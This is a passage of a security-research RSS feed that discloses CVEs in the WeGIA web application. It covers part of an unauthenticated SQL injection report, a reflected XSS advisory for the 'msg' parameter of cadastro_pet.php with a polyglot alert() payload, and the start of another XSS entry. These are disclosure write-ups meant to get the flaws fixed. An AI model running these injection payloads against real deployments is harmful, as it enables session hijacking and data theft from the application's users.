&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: /
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=1, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id_socio=1&amp;amp;amp;pessoa=fisica
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;732&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image-2.png&amp;#34;
	width=&amp;#34;1912&amp;#34;
	height=&amp;#34;730&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image-2_hu_137be9761b6d02cd.png 480w, /p/cve-2025-53823/image-2_hu_20fbca3e6290c25.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;628px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 14 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53824</title>
        <link>https://www.cvehunters.com/p/cve-2025-53824/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53824/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53824-cross-site-scripting-xss-reflected-endpoint-cadastro_petphp-parameter-msg&amp;#34;&amp;gt;CVE-2025-53824: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;c1&amp;#34;&amp;gt;//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53824/image.png&amp;#34;
	width=&amp;#34;909&amp;#34;
	height=&amp;#34;195&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;466&amp;#34;
		data-flex-basis=&amp;#34;1118px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53824-cross-site-scripting-xss-reflected-endpoint-cadastro_petphp-parameter-msg&amp;#34;&amp;gt;CVE-2025-53824: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;c1&amp;#34;&amp;gt;//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53824/image.png&amp;#34;
	width=&amp;#34;909&amp;#34;
	height=&amp;#34;195&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;466&amp;#34;
		data-flex-basis=&amp;#34;1118px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 14 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53377</title>
        <link>https://www.cvehunters.com/p/cve-2025-53377/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53377/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53377-cross-site-scripting-xss-reflected-endpoint-cadastro_dependente_pessoa_novaphp-parameter-id_funcionario&amp;#34;&amp;gt;CVE-2025-53377: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
